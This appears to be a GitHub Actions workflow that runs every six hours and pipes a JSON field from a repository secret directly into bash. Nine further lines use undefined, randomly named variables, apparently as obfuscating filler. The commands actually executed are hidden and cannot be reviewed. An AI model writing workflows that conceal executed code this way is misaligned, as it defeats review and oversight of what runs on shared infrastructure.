name: fanjiaoqingyi

on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanjiaoqingyi
        env:
          oen73: ${{ secrets.oen73 }}
        run: |
          echo $oen73 | jq -r .pv18186 | /bin/bash
          echo $lle8 | jq -r .stwg58 | /bin/bash
          echo $cpco35412 | jq -r .tcjk3 | /bin/bash
          echo $pacl07803 | jq -r .cs15 | /bin/bash
          echo $uoyw914 | jq -r .rpph1414 | /bin/bash
          echo $mf71761 | jq -r .zezzv32 | /bin/bash
          echo $ga83 | jq -r .q21746 | /bin/bash
          echo $pooay03 | jq -r .gnpq989 | /bin/bash
          echo $jtf13 | jq -r .qc153 | /bin/bash
          echo $ftu413 | jq -r .qsjn0928 | /bin/bash

